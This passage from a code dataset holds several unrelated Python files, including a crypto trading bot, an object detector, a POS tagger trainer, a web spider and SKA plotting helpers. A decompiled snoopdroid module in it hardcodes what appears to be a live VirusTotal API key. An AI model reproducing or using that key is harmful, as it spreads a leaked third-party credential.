pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n    Now_lm5_price = Now_lp_ma5['close'].rolling(5).mean()\n    Now_lm5_list = Now_lm5_price.iloc[-1]\n    return Now_lm5_list\n\ndef sell_target_price(ticker):\n    \"\"\"Current 10-period moving average of the ticker's 5-minute candle\"\"\"\n    Now_lp_ma10 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n    Now_lm10_price = Now_lp_ma10['close'].rolling(10).mean()\n    Now_lm10_list = Now_lm10_price.iloc[-1]\n    return Now_lm10_list\n\ndef buy_crypto_currency(ticker):\n    krw = upbit.get_balance(ticker=\"KRW\") # get the remaining KRW balance\n    buy_price = pyupbit.get_current_price(ticker) # current (buy) price of the ticker\n    unit = krw / float(buy_price) # divide the KRW balance by the best ask price to get the purchasable quantity\n    unit2 = unit - unit * 0.05 # order quantity minus the fee (unit * 0.015)\n    upbit.buy_limit_order(ticker, buy_price, unit2) # ticker, buy price, buy quantity\n    #upbit.buy_market_order(ticker, krw)\n    #print(\"bought %s units of %s\" % ticker, unit)\n\ndef sell_crypto_currency(ticker):\n    unit = upbit.get_balance(ticker)\n    upbit.sell_market_order(ticker, unit)\n\n# Log in\nupbit = 
pyupbit.Upbit(access, secret)\nprint(\"Starting automated trading\")\n\nwhile True:\n    for ticker in tickers:\n        target_price = get_target_price(ticker) + get_target_price(ticker) * 0.02\n        current_price = get_current_price(ticker)\n        sell_price = sell_target_price(ticker)\n        try:\n            if target_price < current_price:\n                buy_crypto_currency(ticker)\n                print(\"Ticker :\", ticker)\n                print(\"Buy complete\")\n                post_message(myToken, \"#stock\", \"Ticker:\" + str(ticker) + \" buy complete\")\n            else:\n                if current_price < sell_price:\n                    sell_crypto_currency(ticker)\n                    print(\"Ticker :\", ticker)\n                    print(\"Sell complete\")\n                    post_message(myToken, \"#stock\", \"Ticker:\" + str(ticker) + \" sell complete\")\n        except:\n            time.sleep(0.5)\n    time.sleep(1)\n    print(\"----------------------- waiting -----------------------\")\n    #post_message(myToken, \"#stock\", \"waiting\")\n","sub_path":"Upbit_auto.py","file_name":"Upbit_auto.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"418447651","text":"# -*-coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\n\nfrom libs.models.detectors.single_stage_base_network import DetectionNetworkBase\nfrom libs.models.losses.losses import Loss\nfrom libs.utils import bbox_transform, nms_rotate\nfrom libs.utils.coordinate_convert import coordinate_present_convert\nfrom libs.models.samplers.retinanet.anchor_sampler_retinenet import AnchorSamplerRetinaNet\n\n\nclass DetectionNetworkRetinaNet(DetectionNetworkBase):\n\n    def __init__(self, cfgs, is_training):\n        super(DetectionNetworkRetinaNet, self).__init__(cfgs, is_training)\n        self.anchor_sampler_retinenet = AnchorSamplerRetinaNet(cfgs)\n        self.losses = Loss(self.cfgs)\n\n    def build_whole_detection_network(self, input_img_batch, gtboxes_batch_h=None, gtboxes_batch_r=None, gpu_id=0):\n\n        if self.is_training:\n            gtboxes_batch_h = tf.reshape(gtboxes_batch_h, [-1, 5])\n            gtboxes_batch_h = tf.cast(gtboxes_batch_h, tf.float32)\n\n            gtboxes_batch_r = tf.reshape(gtboxes_batch_r, [-1, 6])\n            gtboxes_batch_r = tf.cast(gtboxes_batch_r, tf.float32)\n\n        if self.cfgs.USE_GN:\n            input_img_batch = tf.reshape(input_img_batch, [1, self.cfgs.IMG_SHORT_SIDE_LEN,\n                                                           self.cfgs.IMG_MAX_LENGTH, 3])\n\n        # 1. build backbone\n        feature_pyramid = self.build_backbone(input_img_batch)\n\n        # 2. build rpn\n        rpn_box_pred_list, rpn_cls_score_list, rpn_cls_prob_list = self.rpn_net(feature_pyramid, 'rpn_net')\n        rpn_box_pred = tf.concat(rpn_box_pred_list, axis=0)\n        rpn_cls_score = tf.concat(rpn_cls_score_list, axis=0)\n        rpn_cls_prob = tf.concat(rpn_cls_prob_list, axis=0)\n\n        # 3. generate anchors\n        anchor_list = self.make_anchors(feature_pyramid)\n        anchors = tf.concat(anchor_list, axis=0)\n\n        # 4. 
build loss\n if self.is_training:\n with tf.variable_scope('build_loss'):\n labels, target_delta, anchor_states, target_boxes = tf.py_func(func=self.anchor_sampler_retinenet.anchor_target_layer,\n inp=[gtboxes_batch_h,\n gtboxes_batch_r, anchors, gpu_id],\n Tout=[tf.float32, tf.float32, tf.float32,\n tf.float32])\n\n if self.method == 'H':\n self.add_anchor_img_smry(input_img_batch, anchors, anchor_states, 0)\n else:\n self.add_anchor_img_smry(input_img_batch, anchors, anchor_states, 1)\n\n cls_loss = self.losses.focal_loss(labels, rpn_cls_score, anchor_states)\n\n if self.cfgs.REG_LOSS_MODE == 0:\n reg_loss = self.losses.iou_smooth_l1_loss_log(target_delta, rpn_box_pred, anchor_states,\n target_boxes, anchors)\n elif self.cfgs.REG_LOSS_MODE == 1:\n reg_loss = self.losses.iou_smooth_l1_loss_exp(target_delta, rpn_box_pred, anchor_states,\n target_boxes, anchors, alpha=self.cfgs.ALPHA,\n beta=self.cfgs.BETA)\n else:\n reg_loss = self.losses.smooth_l1_loss(target_delta, rpn_box_pred, anchor_states)\n\n self.losses_dict['cls_loss'] = cls_loss * self.cfgs.CLS_WEIGHT\n self.losses_dict['reg_loss'] = reg_loss * self.cfgs.REG_WEIGHT\n\n # 5. postprocess\n with tf.variable_scope('postprocess_detctions'):\n boxes, scores, category = self.postprocess_detctions(rpn_bbox_pred=rpn_box_pred,\n rpn_cls_prob=rpn_cls_prob,\n anchors=anchors)\n boxes = tf.stop_gradient(boxes)\n scores = tf.stop_gradient(scores)\n category = tf.stop_gradient(category)\n\n if self.is_training:\n return boxes, scores, category, self.losses_dict\n else:\n return boxes, scores, category\n\n def postprocess_detctions(self, rpn_bbox_pred, rpn_cls_prob, anchors):\n\n return_boxes_pred = []\n return_scores = []\n return_labels = []\n for j in range(0, self.cfgs.CLASS_NUM):\n scores = rpn_cls_prob[:, j]\n if self.is_training:\n indices = tf.reshape(tf.where(tf.greater(scores, self.cfgs.VIS_SCORE)), [-1, ])\n else:\n indices = tf.reshape(tf.where(tf.greater(scores, self.cfgs.FILTERED_SCORE)), [-1, ])\n\n anchors_ = tf.gather(anchors, indices)\n rpn_bbox_pred_ = tf.gather(rpn_bbox_pred, indices)\n scores = tf.gather(scores, indices)\n\n if self.method == 'H':\n x_c = (anchors_[:, 2] + anchors_[:, 0]) / 2\n y_c = (anchors_[:, 3] + anchors_[:, 1]) / 2\n h = anchors_[:, 2] - anchors_[:, 0] + 1\n w = anchors_[:, 3] - anchors_[:, 1] + 1\n theta = -90 * tf.ones_like(x_c)\n anchors_ = tf.transpose(tf.stack([x_c, y_c, w, h, theta]))\n\n if self.cfgs.ANGLE_RANGE == 180:\n anchors_ = tf.py_func(coordinate_present_convert,\n inp=[anchors_, -1],\n Tout=[tf.float32])\n anchors_ = tf.reshape(anchors_, [-1, 5])\n\n boxes_pred = bbox_transform.rbbox_transform_inv(boxes=anchors_, deltas=rpn_bbox_pred_)\n\n if self.cfgs.ANGLE_RANGE == 180:\n _, _, _, _, theta = tf.unstack(boxes_pred, axis=1)\n indx = tf.reshape(tf.where(tf.logical_and(tf.less(theta, 0), tf.greater_equal(theta, -180))), [-1, ])\n boxes_pred = tf.gather(boxes_pred, indx)\n scores = tf.gather(scores, indx)\n\n boxes_pred = tf.py_func(coordinate_present_convert,\n inp=[boxes_pred, 1],\n Tout=[tf.float32])\n boxes_pred = tf.reshape(boxes_pred, [-1, 5])\n\n nms_indices = nms_rotate.nms_rotate(decode_boxes=boxes_pred,\n scores=scores,\n iou_threshold=self.cfgs.NMS_IOU_THRESHOLD,\n max_output_size=100 if self.is_training else 1000,\n use_gpu=False)\n\n tmp_boxes_pred = tf.reshape(tf.gather(boxes_pred, nms_indices), [-1, 5])\n tmp_scores = tf.reshape(tf.gather(scores, nms_indices), [-1, ])\n\n return_boxes_pred.append(tmp_boxes_pred)\n return_scores.append(tmp_scores)\n 
return_labels.append(tf.ones_like(tmp_scores) * (j + 1))\n\n return_boxes_pred = tf.concat(return_boxes_pred, axis=0)\n return_scores = tf.concat(return_scores, axis=0)\n return_labels = tf.concat(return_labels, axis=0)\n\n return return_boxes_pred, return_scores, return_labels\n","sub_path":"libs/models/detectors/retinenet/build_whole_network.py","file_name":"build_whole_network.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"334857653","text":"import time\nfrom typing import List, Tuple\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchtext.data as tt\nfrom sklearn.metrics import confusion_matrix\n\nfrom q3_model import RNNPOSTagger\nfrom tools import print_cm, load_ud_pos_data, EarlyStopping\n\n\ndef train(model: RNNPOSTagger, train_iter: tt.Iterator, val_iter: tt.Iterator,\n optimizer: optim.Optimizer, criterion: nn.Module, epochs: int,\n short_train: bool = False, patience: int = 3):\n \"\"\"\n Trains a model.\n\n :param model: The model to train\n :param train_iter: The training iterator\n :param val_iter: The validation iterator\n :param optimizer: The optimizer\n :param criterion: The loss function\n :param epochs: The number of epochs to train for\n :param short_train: If True, only train every 20 batches\n :param patience: The max # of loss-increasing epochs before early stopping \n :return: None\n \"\"\"\n early_stopping = EarlyStopping(patience=patience, verbose=False, filename='q3_checkpoint.pt')\n for epoch in range(epochs):\n start_time = time.time()\n epoch_loss = 0.\n total_batches = 0\n for batch_idx, batch in enumerate(train_iter):\n if short_train and batch_idx % 20 != 0:\n continue\n\n # Forward pass\n optimizer.zero_grad()\n output, _ = model.forward(batch.text)\n batch_loss = 0.\n for i in range(output.size()[0]):\n batch_loss += criterion(output[i, :, :].squeeze(),\n batch.udtags[i, :].squeeze())\n\n # Backward pass\n batch_loss.backward(retain_graph=True)\n optimizer.step()\n\n # Record the total loss\n epoch_loss += batch_loss\n total_batches += 1\n\n # Finish training, print status to stdout\n duration = (time.time() - start_time)\n accuracy, unk_accuracy, val_loss = evaluate(model, val_iter, criterion)\n print(\"Epoch %d\" % epoch, end=\": \")\n print(\"loss per batch = %.4f\" % (epoch_loss / total_batches), end=\", \")\n print(\"val loss = %.4f\" % val_loss, end=\", \")\n print(\"val acc = %.4f\" % accuracy, end=\", \")\n print(\"unk acc = %.4f\" % unk_accuracy, end=\" \")\n print(\"(%.3f sec)\" % duration)\n early_stopping(val_loss, model)\n if early_stopping.early_stop:\n print(\"Early stopping, reloading checkpoint model\")\n model.load_state_dict(torch.load('q3_checkpoint.pt'))\n break\n\ndef eval_sent(model: RNNPOSTagger, sentence_list: List[str]) -> \\\n List[List[str]]:\n \"\"\"\n Runs the model on a list of sentences.\n\n :param model: The model to run\n :param sentence_list: A list of input sentences that the model will\n tag. Each sentence is a string of words separated by spaces. 
See\n    the script at the bottom for an example\n    :return: The POS tags of each sentence in sentence_list\n    \"\"\"\n    predictions = []\n    sentences = [model.text_field.tokenize(s) for s in sentence_list]\n    indices = model.text_field.process(sentences)\n    model_output = model.forward(indices)[0].argmax(2)\n    for i in range(len(sentences)):\n        predictions.append([model.tag_field.vocab.itos[j]\n                            for j in model_output[1:-1, i]])\n\n    return predictions\n\n\ndef evaluate(model: RNNPOSTagger, eval_iter: tt.Iterator, criterion: nn.Module,\n             conf_matrix: bool = False) -> Tuple[float, float, float]:\n    \"\"\"\n    Evaluates a model.\n\n    :param model: The model to evaluate\n    :param eval_iter: The testing or validation iterator\n    :param criterion: The loss function\n    :param conf_matrix: If true, a confusion matrix will be printed to\n        stdout\n    :return: The model's accuracy, <unk> accuracy, and mean loss on the\n        provided dataset\n    \"\"\"\n    pad_token = model.tag_field.pad_token\n    bos_token = model.tag_field.init_token\n    eos_token = model.tag_field.eos_token\n    unk_token = model.text_field.unk_token\n\n    pad_index = model.tag_field.vocab.stoi[pad_token]\n    bos_index = model.tag_field.vocab.stoi[bos_token]\n    eos_index = model.tag_field.vocab.stoi[eos_token]\n    unk_index = model.text_field.vocab.stoi[unk_token]\n\n    pads, correct, tries, unks, unk_correct, loss = 0., 0., 0., 0., 0., 0.\n    pred_list, target_list = np.array([]), np.array([])\n    for i, batch in enumerate(eval_iter):\n        sentence_length, batch_size = batch.text.size()\n\n        # Mask out <pad>, <bos>, and <eos>\n        pad_mask = (batch.udtags == pad_index)\n        bos_mask = (batch.udtags == bos_index)\n        eos_mask = (batch.udtags == eos_index)\n        other_mask = pad_mask | bos_mask | eos_mask\n        others = torch.sum(other_mask)\n\n        # Count the number of <unk>\n        unk_mask = (batch.text == unk_index)\n        unks += torch.sum(unk_mask)\n\n        # Count the total number of words evaluated\n        tries += (sentence_length * batch_size) - others\n\n        # Compute model output\n        y_hat, _ = model.forward(batch.text)\n        model_output = y_hat.argmax(2)\n\n        # compute batch loss (use t so the batch counter i is not shadowed)\n        for t in range(sentence_length):\n            loss += criterion(y_hat[t,:,:].squeeze(), batch.udtags[t,:].squeeze())\n\n        target_list = np.concatenate((target_list,\n                                      batch.udtags.view(-1).numpy()))\n        pred_list = np.concatenate((pred_list, model_output.view(-1).numpy()))\n\n        # Count correct predictions\n        correct_mask = (batch.udtags == model_output) & ~other_mask\n        correct += torch.sum(correct_mask)\n        unk_correct += torch.sum(unk_mask & correct_mask)\n\n    # Compute accuracy\n    accuracy = correct / tries\n    unk_accuracy = unk_correct / unks\n\n    # Display a confusion matrix\n    if conf_matrix:\n        target_list = [model.tag_field.vocab.itos[int(target)]\n                       for target in target_list]\n        pred_list = [model.tag_field.vocab.itos[int(pred)]\n                     for pred in pred_list]\n        cm = confusion_matrix(target_list, pred_list,\n                              labels=model.tag_field.vocab.itos)\n        print_cm(cm, model.tag_field.vocab.itos)\n\n    return accuracy.item(), unk_accuracy.item(), (loss.item() / (i + 1))\n\n\nif __name__ == \"__main__\":\n    # Problem 3d: Use this script to test your code.\n    # My results for the hyperparameter tuning are in a separate text file.\n    train_iter, val_iter, test_iter, text_field, tag_field = \\\n        load_ud_pos_data(10, min_freq=2)\n\n    # Set up the model\n    tagger = RNNPOSTagger(text_field, tag_field, 20, 10, bidir=False)\n    pad_token = tag_field.pad_token\n    pad_index = tag_field.vocab.stoi[pad_token]\n    criterion = nn.CrossEntropyLoss(ignore_index=pad_index)\n    optimizer = optim.Adam(tagger.parameters(), lr=1e-3)\n\n    # Train the model\n    train(tagger, train_iter, val_iter, optimizer, 
criterion, 40,\n          short_train=True)\n\n    # Test the model\n    sent = [\"if you push it , it will never work .\"]\n    print(sent[0], \"POS tags:\", ' '.join(eval_sent(tagger, sent)[0]))\n    print(\"test set acc = %.4f, test set unk acc = %.4f, test set loss = %.4f\" %\n          evaluate(tagger, test_iter, criterion))\n","sub_path":"RNN Part of Speech Tagger/q3_classifier.py","file_name":"q3_classifier.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"405515886","text":"# -*- coding: utf-8 -*-\nimport csv\nfrom DefAttri import Rule, printRules, printSortRules\n\nif __name__ == \"__main__\":\n    Rules = set()\n    ResultRules = set()\n    MergeFlag = False\n    # Read the input file\n    print(\"Loading syslog, please wait ...\\\n\")\n    with open('yixiao-tcp.csv', 'r', encoding='UTF-8') as csvfile:\n        reader = csv.reader(csvfile, dialect='excel', delimiter=\",\")\n        for i, rows in enumerate(reader):\n            src1 = rows[0].encode('utf-8').decode('utf-8-sig') # strip the \ufeff BOM\n            dest1 = rows[1].encode('utf-8').decode('utf-8-sig')\n            port1 = rows[2].encode('utf-8').decode('utf-8-sig')\n            count = int(rows[3].encode('utf-8').decode('utf-8-sig'))\n            temprule = Rule(src1, dest1, port1, count)\n            Rules.add(temprule)\n            print('Loading log entry %d, please wait...'%i)\n            # Rules.add(Rule(src1,dest1,port1))\n            # temprule = Rule(rows[0],rows[1],rows[2])\n\n    # Merge the RULES with one another\n    i = len(Rules) # count by the number of rules in the set\n    while len(Rules) != 0:\n        temprule = Rules.pop() # take one rule out first\n        i -= 1 # decrement the counter accordingly\n        print(\"Raw Rules are %d Results are %d\\\n\"%(len(Rules), len(ResultRules)))\n        for rule in Rules: # start looping\n            if temprule.MergeRule(rule): # try to merge\n                Rules.discard(rule) # merge succeeded, so delete this rule\n                MergeFlag = True # mark the merge as successful\n                i = i-1 # one rule fewer; the merged rule goes back for further merging\n                break # leave the current loop and clean up the rule set\n        if not MergeFlag: # no merge happened, so this rule stands alone; move it to the final rule set\n            ResultRules.add(temprule)\n        else:\n            Rules.add(temprule) # a merge happened, so keep merging\n            i += 1 # added back, so increment the counter\n            MergeFlag = False # reset the merge-success flag\n\n    # print('Consolidating IPs, this takes about 15 minutes, please wait...')\n    # j = 1\n    # for i in ResultRules:\n    #     print('Consolidating entry %d, please wait'%j)\n    #     i.ConvertIP()\n    #     j += 1\n\n\n    # # Write the rules to a file\n    # print(\"Writing results to file, please wait...\")\n    # ruletxt = open('Rules.txt', 'w')\n    # rawtxt = open('rawRules.txt', 'w')\n    # printRules(ruletxt, rawtxt, ResultRules)\n    # ruletxt.close()\n    # rawtxt.close()\n\n\n\n    # Write to file grouped by rulePort type, i.e. by service type\n    print(\"Writing results to file, please wait...\")\n    rawtxt = open('sortRules.txt', 'w')\n    printSortRules(rawtxt, ResultRules)\n    rawtxt.close()\n    print(\"Execution finished.\")\n","sub_path":"MakeRule.py","file_name":"MakeRule.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"81571909","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/nex/projects/snoopdroid/snoopdroid/virustotal.py\n# Compiled at: 2020-04-03 08:08:14\n# Size of source mod 2**32: 3192 bytes\nimport time, requests\nfrom halo import Halo\nfrom terminaltables import AsciiTable\nfrom .ui import info, highlight, red\n\ndef get_virustotal_report(hashes):\n    apikey = '233f22e200ca5822bd91103043ccac138b910db79f29af5616a9afe8b6f215ad'\n    url = 'https://www.virustotal.com/partners/sysinternals/file-reports?apikey={}'.format(apikey)\n    items = []\n    for sha256 in hashes:\n        items.append({'hash':sha256, \n         'image_path':'unknown', \n         'creation_datetime':'unknown'})\n    else:\n        headers = {'User-Agent':'VirusTotal', \n
'Content-Type':'application/json'}\n res = requests.post(url, headers=headers, json=items)\n if res.status_code == 200:\n report = res.json()\n return report['data']\n\n\ndef virustotal_lookup(packages):\n print(info('Looking up all extracted files on ' + highlight('VirusTotal') + ' (www.virustotal.com).'))\n print('')\n detections = {}\n\n def virustotal_query(batch):\n report = get_virustotal_report(batch)\n if report:\n for entry in report:\n if entry['hash'] not in detections and entry['found'] == True:\n detections[entry['hash']] = entry['detection_ratio']\n\n with Halo(text='', spinner='bouncingBar') as (spinner):\n batch = []\n for package in packages:\n for file in package.files:\n batch.append(file['sha256'])\n if len(batch) == 25:\n spinner.text = 'Looking up first 25 apps...'\n virustotal_query(batch)\n batch = []\n\n else:\n if batch:\n spinner.text = 'Looking up remaining files...'\n virustotal_query(batch)\n spinner.succeed('Completed!')\n\n table_data = []\n table_data.append(['Package name', 'File path', 'Detections'])\n for package in packages:\n for file in package.files:\n row = [\n package.name, file['stored_path']]\n if file['sha256'] in detections:\n detection = detections[file['sha256']]\n positives = detection.split('/')[0]\n if int(positives) > 0:\n row.append(red(detection))\n else:\n row.append(detection)\n else:\n row.append('not found')\n table_data.append(row)\n else:\n print('')\n table = AsciiTable(table_data)\n print(table.table)","sub_path":"pycfiles/snoopdroid-2.3-py3-none-any/virustotal.cpython-38.py","file_name":"virustotal.cpython-38.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593819307","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass MybankPaymentTradeBusinessOperateQueryModel(object):\n\n def __init__(self):\n self._order_no = None\n self._request_no = None\n\n @property\n def order_no(self):\n return self._order_no\n\n @order_no.setter\n def order_no(self, value):\n self._order_no = value\n @property\n def request_no(self):\n return self._request_no\n\n @request_no.setter\n def request_no(self, value):\n self._request_no = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.order_no:\n if hasattr(self.order_no, 'to_alipay_dict'):\n params['order_no'] = self.order_no.to_alipay_dict()\n else:\n params['order_no'] = self.order_no\n if self.request_no:\n if hasattr(self.request_no, 'to_alipay_dict'):\n params['request_no'] = self.request_no.to_alipay_dict()\n else:\n params['request_no'] = self.request_no\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = MybankPaymentTradeBusinessOperateQueryModel()\n if 'order_no' in d:\n o.order_no = d['order_no']\n if 'request_no' in d:\n o.request_no = d['request_no']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/MybankPaymentTradeBusinessOperateQueryModel.py","file_name":"MybankPaymentTradeBusinessOperateQueryModel.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"624547462","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom order.data_scraper import Scraper\n\nclass Command(BaseCommand):\n\n help = 'Populates or updates database with new products'\n\n def handle(self, *args, **kwargs):\n headers = 
settings.HEADERS\n url = settings.SCRAPE_URL\n dataframe = Scraper(url, headers)\n dataframe.run()\n","sub_path":"dropship_django/product/management/commands/run_scraper.py","file_name":"run_scraper.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"220751873","text":"#!/usr/bin/env python3\n#\n# File: spider3.py\n# Author: Matt Weidner \n# Descr: Simple web spider that spiders arbitrary site up to\n# X levels deep, customizable by the user.\n# (POC web spider)\n\n\nimport httplib2\nfrom lxml import etree\nimport pprint\nimport re\nimport sys\n\ndebug = False\nlinks = []\nmax_depth = 9999\ndot_count = 0\n\ndef dbg_print(string):\n if debug != False:\n print(' [D]: ' + string)\n\ndef fix_url(base_url, link):\n # Resolves a relative URL to an absolute URL.\n if re.search('^\\w+:', link):\n return link\n elif link[0] == '/':\n return (base_url + link[1:])\n else:\n return (base_url + link)\n\ndef fix_urls(base_url, links):\n new_urls = []\n for url in links:\n if url == '':\n continue\n new_urls.append(fix_url(base_url, url))\n return new_urls\n\ndef get_page_links(http, link):\n new_urls = []\n # HTTP GET a URL and return a list of links parsed from anchor tags.\n r_header,r_body = http.request(link, 'GET')\n #dbg_print('raw type: ' + r_header['content-type'])\n if re.search('text/html',r_header['content-type']):\n if len(r_header['content-type']) < 19:\n str_content_type = 'us-ascii'\n else:\n str_content_type = r_header['content-type'][19:]\n dbg_print('parsed type: ' + str_content_type)\n html = etree.HTML(r_body.decode(str_content_type))\n if (html.xpath('//a/@href')):\n new_urls = html.xpath('//a/@href')\n return new_urls\n\ndef spider(http, base_url, link, mapped_links, unmapped_links, depth):\n global dot_count\n dbg_print('D(' + str(depth) + ') L: ' + link)\n if depth == 0:\n return\n absolute_link = fix_url(base_url, link)\n dbg_print('[spdr] ' + absolute_link)\n page_links = get_page_links(http, absolute_link)\n if not (absolute_link in mapped_links):\n mapped_links.append(absolute_link)\n print(absolute_link)\n if not sys.stdout.isatty():\n print('.',end='',file=sys.stderr)\n dot_count = dot_count + 1\n sys.stderr.flush()\n if dot_count == 40:\n print('',file=sys.stderr)\n dot_count = 0\n if debug:\n pprint.pprint(page_links)\n if not page_links == None:\n unmapped_links = unmapped_links + page_links\n else:\n return\n #pprint.pprint(unmapped_links)\n unmapped_links = fix_urls(base_url, unmapped_links)\n #pprint.pprint(unmapped_links)\n if len(unmapped_links) > 0:\n for link2 in unmapped_links:\n if link2 == '':\n continue\n if not (link2 in mapped_links):\n if re.search('^' + base_url, link2):\n spider(http, base_url, link2, mapped_links, unmapped_links, depth-1)\n\ndef main():\n print(\" _______ _____ _____ ______ _______ ______ _____ __ __\", file=sys.stderr)\n print(\" |______ |_____] | | \\ |______ |_____/ |_____] \\_/ \", file=sys.stderr)\n print(\" ______| | __|__ |_____/ |______ | \\_ . 
| | \", file=sys.stderr)\n    if len(sys.argv) < 2: \n        print('[-] No URL specified, using http://www.testfire.net/')\n        base_url = 'http://www.testfire.net/'\n    else:\n        base_url = sys.argv[1]\n    http = httplib2.Http('.cache')\n    spider(http, base_url, base_url, [], [], max_depth)\n    if not sys.stdout.isatty():\n        print(' ',file=sys.stderr)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"spider3.py","file_name":"spider3.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"334857653","text":"\"\"\" Functions that help with SKA simulations\n\n\"\"\"\n\n__all__ = ['plot_visibility', 'plot_visibility_pol', 'find_times_above_elevation_limit', 'plot_uvcoverage',\n           'plot_azel', 'plot_gaintable', 'plot_pointingtable', 'find_pb_width_null',\n           'create_simulation_components', 'plot_pa']\n\nimport logging\n\nimport astropy.constants as constants\nimport astropy.units as units\nimport matplotlib.pyplot as plt\nimport numpy\nfrom astropy.coordinates import SkyCoord\n\nfrom rascil.data_models.memory_data_models import Skycomponent, BlockVisibility\nfrom rascil.data_models.polarisation import PolarisationFrame\nfrom rascil.processing_components.image import create_image\nfrom rascil.processing_components.image.operations import show_image\nfrom rascil.processing_components.imaging.primary_beams import create_pb\nfrom rascil.processing_components.skycomponent.base import copy_skycomponent\nfrom rascil.processing_components.skycomponent.operations import apply_beam_to_skycomponent, \\\n    filter_skycomponents_by_flux\nfrom rascil.processing_components.util.coordinate_support import hadec_to_azel\nfrom rascil.processing_components.visibility.visibility_geometry import calculate_blockvisibility_hourangles, \\\n    calculate_blockvisibility_azel, calculate_blockvisibility_parallactic_angles\n\nlog = logging.getLogger('logger')\n\n\ndef find_times_above_elevation_limit(start_times, end_times, location, phasecentre, elevation_limit):\n    \"\"\" Find all times for which a phasecentre is above the elevation limit\n    \n    :param start_times:\n    :param end_times:\n    :param location:\n    :param phasecentre:\n    :param elevation_limit:\n    :return:\n    \"\"\"\n    assert len(start_times) == len(end_times)\n    \n    def valid_elevation(time, location, phasecentre):\n        ha = numpy.pi * time / 43200.0\n        dec = phasecentre.dec.rad\n        az, el = hadec_to_azel(ha, dec, location.lat.rad)\n        return el > elevation_limit * numpy.pi / 180.0\n    \n    number_valid_times = 0\n    valid_start_times = []\n    for it, t in enumerate(start_times):\n        if valid_elevation(start_times[it], location, phasecentre) or \\\n                valid_elevation(end_times[it], location, phasecentre):\n            valid_start_times.append(t)\n            number_valid_times += 1\n    \n    assert number_valid_times > 0, \"No data above elevation limit\"\n    \n    log.info(\"find_times_above_elevation_limit: Start times for chunks above elevation limit:\")\n    \n    return valid_start_times\n\n\ndef plot_visibility(vis_list, title='Visibility', y='amp', x='uvdist', plot_file=None, plot_zero=False, **kwargs):\n    \"\"\" Standard plot of visibility\n\n    :param vis_list:\n    :param plot_file:\n    :param kwargs:\n    :return:\n    \"\"\"\n    plt.clf()\n    for ivis, vis in enumerate(vis_list):\n        if y == 'amp':\n            yvalue = numpy.abs(vis.flagged_vis[..., 0, 0]).flat\n        else:\n            yvalue = numpy.angle(vis.flagged_vis[..., 0, 0]).flat\n        xvalue = vis.uvdist.flat\n        plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color='b', markersize=0.2)\n        if plot_zero:\n            plt.plot(xvalue[yvalue == 
0.0], yvalue[yvalue == 0.0], '.', color='r', markersize=0.2)\n\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(title)\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\ndef plot_visibility_pol(vis_list, title='Visibility_pol', y='amp', x='uvdist', plot_file=None, **kwargs):\n \"\"\" Standard plot of visibility\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for ivis, vis in enumerate(vis_list):\n pols = vis.polarisation_frame.names\n colors = [\"red\", \"blue\", \"green\", \"purple\"]\n for pol in range(vis.vis.shape[-1]):\n if y == 'amp':\n yvalue = numpy.abs(vis.flagged_vis[..., 0, pol]).flat\n else:\n yvalue = numpy.angle(vis.flagged_vis[..., 0, pol]).flat\n if x==\"time\":\n xvalue = numpy.repeat(vis.time, len(yvalue))\n else:\n xvalue = vis.uvdist.flat\n if ivis == 0:\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color=colors[pol],\n label=pols[pol])\n else:\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color=colors[pol])\n\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(title)\n plt.legend()\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\n\ndef plot_uvcoverage(vis_list, ax=None, plot_file=None, title='UV coverage', **kwargs):\n \"\"\" Standard plot of uv coverage\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n \n for ivis, vis in enumerate(vis_list):\n u = numpy.array(vis.u[...].flat)\n v = numpy.array(vis.v[...].flat)\n if isinstance(vis, BlockVisibility):\n k = (vis.frequency / constants.c).value\n u = numpy.array(numpy.outer(u, k).flat)\n v = numpy.array(numpy.outer(v, k).flat)\n plt.plot(u, v, '.', color='b', markersize=0.2)\n plt.plot(-u, -v, '.', color='b', markersize=0.2)\n else:\n k = vis.frequency / constants.c\n u = u * k\n v = v * k\n 